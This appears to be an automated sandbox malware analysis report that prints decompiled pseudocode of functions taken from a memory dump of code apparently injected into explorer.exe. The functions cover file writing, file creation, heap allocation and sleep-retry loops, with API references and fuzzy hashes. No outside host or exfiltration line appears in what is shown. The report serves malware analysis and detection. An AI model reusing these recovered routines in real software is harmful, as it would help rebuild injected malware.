        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Heap$AgentAllocateFreeObtainStringUser
        • String ID:
        • API String ID: 471734292-0
        • Opcode ID: d64ad438d1f21712e29717cacfc5ecf1b2ada0c73ac6bad4d088b33bcd025bf9
        • Instruction ID: 8079f1387fde3651cf51c068454c49593d8a393480f3ea93dffd8e4335a106f5
        • Opcode Fuzzy Hash: d64ad438d1f21712e29717cacfc5ecf1b2ada0c73ac6bad4d088b33bcd025bf9
        • Instruction Fuzzy Hash: 7DF06230609240EBF788EBB4DC4AF9D77E4AB15364F24425DE415DB2D2EFB499409628
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA65C, Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON
        Download Yara Rule
        C-Code - Quality: 88%
        			E000CA65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}









        0x000ca65c
        0x000ca65f
        0x000ca660
        0x000ca663
        0x000ca665
        0x000ca668
        0x000ca66d
        0x000ca69e
        0x000ca6a0
        0x000ca66f
        0x000ca66f
        0x000ca66f
        0x000ca691
        0x00000000
        0x00000000
        0x000ca693
        0x000ca696
        0x000ca69c
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x000ca69c
        0x000ca6a5
        0x000ca6a5
        0x000ca6a1
        0x000ca6a4

        APIs
        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000C8F51,?), ref: 000CA689
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: FileWrite
        • String ID:
        • API String ID: 3934441357-0
        • Opcode ID: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
        • Instruction ID: e0b687cbe582983185d491bef9ae05b3aa73082748710466be92ceb60ada6772
        • Opcode Fuzzy Hash: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
        • Instruction Fuzzy Hash: E7F01D72A10118BFDB10DFA8C884FAE77ECEB05785F144169B505E7140D670EE4097A1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA5F7, Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000CA5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0xde684; // 0x64f8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}






        0x000ca601
        0x000ca615
        0x000ca61a
        0x000ca623
        0x000ca625
        0x000ca62f
        0x000ca62f
        0x00000000
        0x000ca635
        0x00000000

        APIs
        • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,000C8F39), ref: 000CA612
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
        • Instruction ID: 2e7d981304f5d219390b7102899e7dea75ca9fc1daa0b5ba6031beeb52369677
        • Opcode Fuzzy Hash: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
        • Instruction Fuzzy Hash: E6E09AB23020187EFA202B689CC8F7B26ACE79A7F9F060239FA51C71E0C6208C014271
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA63B, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
        Download Yara Rule
        C-Code - Quality: 68%
        			E000CA63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}




        0x000ca64f
        0x000ca652
        0x000ca657
        0x000ca65b

        APIs
        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,000CA6C9,00000000,00000400,00000000,000CF8B5,000CF8B5,?,000CFA56,00000000), ref: 000CA64F
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
        • Instruction ID: 1068c18890d774138d04a37c6931822a42b8c5c396f3f8334ead4a3a4bc70c88
        • Opcode Fuzzy Hash: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
        • Instruction Fuzzy Hash: 73D012B13A0100BEFB2C9B34CD9AF72339CD714701F22025C7A06EA0E1CA69E9048720
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C8604, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000C8604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xde768, 8, _a4); // executed
				return _t2;
			}




        0x000c8612
        0x000c8619

        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
        • Instruction ID: 67f2f94d9d2d1e8656920a461522efd37944946b4c73135d0d1b7f49406c2d62
        • Opcode Fuzzy Hash: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
        • Instruction Fuzzy Hash: CFB09235085A08BBFEC12B81ED05E843F69EB04655F008012FA08080708A6664649BA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CB269, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000CB269(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}



        0x000cb27c

        APIs
        • GetFileAttributesW.KERNELBASE(00000000,000C4E7B), ref: 000CB26F
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 66e348a4375615d6ddbf5efb008cd9aa4b82378b74d2163687bee5487349325c
        • Instruction ID: e31c5f2542f69ce23b2b76098601bb74ace79624de71742bfcf3cc401eb3d774
        • Opcode Fuzzy Hash: 66e348a4375615d6ddbf5efb008cd9aa4b82378b74d2163687bee5487349325c
        • Instruction Fuzzy Hash: E5B092B62210404BCA186B38998484D32909B1C2313220759B033CA0E1D624C8509A10
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C85EF, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000C85EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0xde768 = _t1;
				return _t1;
			}




        0x000c85f8
        0x000c85fe
        0x000c8603

        APIs
        • HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateHeap
        • String ID:
        • API String ID: 10892065-0
        • Opcode ID: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
        • Instruction ID: 97f405ab2dff3ce32c07cefcd6e371dde968c6b9a07cde9570e7adef5d1870a3
        • Opcode Fuzzy Hash: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
        • Instruction Fuzzy Hash: 3EB01270686700A6F3D03B209C06B003B50A300B06F304007FF045C1D0CBB41004CF34
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CF9BF, Relevance: 1.4, APIs: 1, Instructions: 119sleepCOMMON
        Download Yara Rule
        C-Code - Quality: 89%
        			E000CF9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0xde654; // 0x64fd30
				_t27 = E000C8604( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0xde654; // 0x64fd30
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000C86E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E000C109A(_t63, 0x34a);
						_t66 =  *0xde688; // 0xf0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000C95E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0xde688; // 0xf0000
						_push(_t67);
						_v20 = E000C92E5(_t39 + 0x1020);
						_t42 = E000CA6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000C85D5( &_v24);
						E000C85D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0xde654; // 0x64fd30
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000C86E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E000C861A( &_v16, _t69);
						E000C861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0xde654; // 0x64fd30
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0xde688; // 0xf0000
						_t31 = E000CA77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0xde654; // 0x64fd30
							continue;
						}
						break;
					}
					E000C861A( &_v12, 0); // executed
				}
				return 0;
			}

























        0x000cf9c5
        0x000cf9cd
        0x000cf9d2
        0x000cf9d8
        0x000cf9de
        0x000cf9f1
        0x000cf9fb
        0x000cfa05
        0x000cfa08
        0x000cfa0d
        0x000cfa23
        0x000cfa27
        0x000cfa2c
        0x000cfa2d
        0x000cfa2e
        0x000cfa33
        0x000cfa36
        0x000cfa37
        0x000cfa38
        0x000cfa3d
        0x000cfa4c
        0x000cfa51
        0x000cfa56
        0x000cfa5d
        0x000cfa66
        0x000cfa6b
        0x000cfa6e
        0x000cfa71
        0x000cfa76
        0x000cfa7c
        0x000cfa81
        0x000cfa86
        0x000cfa89
        0x000cfa9c
        0x000cfaa1
        0x000cfaa4
        0x000cfaa4
        0x000cfaac
        0x000cfab7
        0x000cfabc
        0x000cfabf
        0x000cfac2
        0x000cfac2
        0x000cfac8
        0x000cfaca
        0x000cface
        0x000cfad9
        0x000cfade
        0x000cfae3
        0x00000000
        0x00000000
        0x000cfaec
        0x000cfaf2
        0x000cfaf9
        0x000cfafb
        0x000cfafe
        0x00000000
        0x000cfafe
        0x00000000
        0x000cfaf9
        0x000cfb0b
        0x000cfb14
        0x000cfb18

        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,000CF8B5,?,?,?,000CFCB9,00000000), ref: 000CFAEC
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeapSleep
        • String ID:
        • API String ID: 4201116106-0
        • Opcode ID: 89e5b95cc690eaffc7b1ec14aca8cca0db16b86c99a9d2d3fdf60401a230e78e
        • Instruction ID: 0cbca30703809a2c9c0d4c860327d646f2255841ca950a665f446f2c8c25f923
        • Opcode Fuzzy Hash: 89e5b95cc690eaffc7b1ec14aca8cca0db16b86c99a9d2d3fdf60401a230e78e
        • Instruction Fuzzy Hash: F0417FB2A00105ABEB04EBA4CD85FAEB7BDEB54304B14407EF905DB242DB39DA05CB65
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C896F, Relevance: 1.4, APIs: 1, Instructions: 107stringCOMMON
        Download Yara Rule
        C-Code - Quality: 97%
        			E000C896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E000C8604(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E000C8604(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E000C87EA(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E000C861A( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0xde684; // 0x64f8f0
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E000C861A(_t73, 0);
						}
						E000C861A( &_v20, 0);
						goto L1;
					}
					_t43 = E000CA6A9(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E000C8815(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0xde684; // 0x64f8f0
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E000C861A( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}
















        0x000c8975
        0x000c897c
        0x000c897e
        0x000c8986
        0x000c8988
        0x000c8990
        0x000c8992
        0x000c8995
        0x000c8998
        0x000c89ac
        0x000c89b3
        0x000c89b9
        0x000c89c2
        0x000c8a1a
        0x000c8a1f
        0x000c8a28
        0x000c8a75
        0x000c8a78
        0x000c8a80
        0x000c8a84
        0x000c8a84
        0x000c8a89
        0x00000000
        0x000c8a89
        0x000c8a2a
        0x000c8a2c
        0x000c8a34
        0x000c8a3a
        0x000c8a3b
        0x000c8a3b
        0x000c8a43
        0x000c8a46
        0x000c8a4b
        0x000c8a4b
        0x000c8a4e
        0x000c8a57
        0x000c8a5c
        0x000c8a62
        0x000c8a69
        0x00000000
        0x000c8a6f
        0x000c89cb
        0x000c89d0
        0x000c89d2
        0x000c89d9
        0x00000000
        0x00000000
        0x000c89ee
        0x00000000
        0x000c89f0
        0x000c89f0
        0x000c89fb
        0x000c89fe
        0x000c8a0b
        0x00000000
        0x000c8a11
        0x000c89ee
        0x000c899a
        0x00000000

        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000C89B9
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeaplstrcpyn
        • String ID:
        • API String ID: 680773602-0
        • Opcode ID: ea4ba919963f8db97ca774dc6b51950c5f4ee3be6646b617ec81c8140057174e
        • Instruction ID: f7af5643379fb798a10d9983aff7c2aee7eeb5d10f7fdca91578ae01a6c37180
        • Opcode Fuzzy Hash: ea4ba919963f8db97ca774dc6b51950c5f4ee3be6646b617ec81c8140057174e
        • Instruction Fuzzy Hash: 96318172A04304EFEB249BA5D845F9EB7E9EF44760F64842EF50597182DF30AA00875D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CE2C6, Relevance: 1.3, APIs: 1, Instructions: 92sleepCOMMON
        Download Yara Rule
        C-Code - Quality: 75%
        			E000CE2C6(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0xde6b4; // 0x64fa98, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0xde6b4; // 0x64fa98
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0xde68c; // 0x64fab8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E000C8604(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0xde68c; // 0x64fab8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E000C4905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}





















        0x000ce2c6
        0x000ce2d9
        0x000ce2e0
        0x000ce2e9
        0x000ce2f1
        0x000ce2f7
        0x000ce2fc
        0x000ce307
        0x000ce30c
        0x000ce3a5
        0x000ce3a5
        0x000ce3ad
        0x00000000
        0x000ce3b2
        0x000ce313
        0x000ce316
        0x000ce31d
        0x000ce32d
        0x000ce333
        0x000ce343
        0x000ce348
        0x000ce34d
        0x000ce354
        0x000ce358
        0x000ce35f
        0x000ce363
        0x000ce367
        0x000ce368
        0x000ce36b
        0x000ce370
        0x000ce379
        0x000ce385
        0x000ce38f
        0x000ce394
        0x000ce394
        0x000ce379
        0x000ce39a
        0x000ce39b
        0x00000000
        0x000ce3a4
        0x00000000

        APIs
        • Sleep.KERNELBASE(0000000A), ref: 000CE394
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Sleep
        • String ID:
        • API String ID: 3472027048-0
        • Opcode ID: b630c363af7e2f7ad05f24635a6b5b40618a96c512f4d6a81e662aa74840ab76
        • Instruction ID: d27438c55f7a9eb286fce9ed97ab300969749f514a42abca27bfc32afb8dea28
        • Opcode Fuzzy Hash: b630c363af7e2f7ad05f24635a6b5b40618a96c512f4d6a81e662aa74840ab76
        • Instruction Fuzzy Hash: 1A310DB5900158AFDB11DF94CD88EEFBBBCEB08350F1142AAB911E7291D730AE018B61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA3ED, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000CA3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E000C9ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E000C9749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E000CA0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E000C9F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}













        0x000ca3ed
        0x000ca3f6
        0x000ca3f8
        0x000ca3fa
        0x000ca3fe
        0x000ca400
        0x000ca408
        0x000ca40f
        0x000ca418
        0x000ca41d
        0x000ca422
        0x000ca446
        0x000ca44b
        0x000ca451
        0x000ca45d
        0x000ca462
        0x000ca424
        0x000ca42d
        0x000ca443
        0x00000000
        0x000ca42f
        0x000ca43b
        0x000ca440
        0x000ca42d
        0x000ca422
        0x000ca465
        0x000ca466
        0x000ca400
        0x000ca470

        APIs
          • Part of subcall function 000C9749: SetLastError.KERNEL32(0000000D,00000000,00000000,000CA341,00000000,00000000,?,?,?,000C5AE1), ref: 000C9782
        • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,000C4C60,?,?,00000000), ref: 000CA424
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: ErrorLast
        • String ID:
        • API String ID: 1452528299-0
        • Opcode ID: b57cf1d61cdb095835d73ad5a8e6bc193129740f7953490e1dc8bc682e72e34b
        • Instruction ID: d7e6118cc00964f766b737b52ca09863481d2aae4fe2f29f29cc8711e36414d7
        • Opcode Fuzzy Hash: b57cf1d61cdb095835d73ad5a8e6bc193129740f7953490e1dc8bc682e72e34b
        • Instruction Fuzzy Hash: 71116175B0010AABCB14DF59C489F9EF3AAFB85719F20816DD80197242DB70ED05CBD1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C5D7D, Relevance: 1.3, APIs: 1, Instructions: 49stringCOMMON
        Download Yara Rule
        C-Code - Quality: 95%
        			E000C5D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0xde688; // 0xf0000
				E000CA86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0xde684; // 0x64f8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0xde688; // 0xf0000
					_t12 = E000C5974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0xde6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E000C9EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0xde688; // 0xf0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0xde684; // 0x64f8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}















        0x000c5d80
        0x000c5d95
        0x000c5d9e
        0x000c5da7
        0x000c5da9
        0x000c5db1
        0x000c5dc1
        0x000c5dcf
        0x000c5dd4
        0x000c5dd9
        0x000c5ddb
        0x000c5ddd
        0x000c5de2
        0x000c5de4
        0x000c5dff
        0x000c5dff
        0x000c5de6
        0x000c5de7
        0x000c5df2
        0x000c5dfa
        0x000c5dfc
        0x000c5dfc
        0x000c5de4
        0x000c5e01
        0x000c5db3
        0x000c5db4
        0x000c5db9
        0x000c5dbe
        0x000c5dbe
        0x000c5e05

        APIs
        • lstrcmpiW.KERNEL32(000EFDD8,00000000), ref: 000C5DF2
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: lstrcmpi
        • String ID:
        • API String ID: 1586166983-0
        • Opcode ID: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
        • Instruction ID: 103ad920e2b6f5a977f8ee732e07f157b635f09cc7f745bb5b42d842e6e571db
        • Opcode Fuzzy Hash: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
        • Instruction Fuzzy Hash: 7201B1312026119FF754EBA9DC89F9E33E8DB58341F054029F902DF1E2DA60E840C7B1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CBA05, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000CBA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0xde68c; // 0x64fab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E000CB998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0xde684; // 0x64f8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}












        0x000cba0a
        0x000cba12
        0x000cba1a
        0x000cba1f
        0x000cba29
        0x000cba32
        0x000cba37
        0x000cba3c
        0x000cba5a
        0x000cba5d
        0x000cba3e
        0x000cba41
        0x000cba43
        0x000cba4b
        0x000cba4b
        0x000cba4e
        0x000cba4e
        0x000cba61
        0x000cba22
        0x000cba22
        0x000cba22

        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
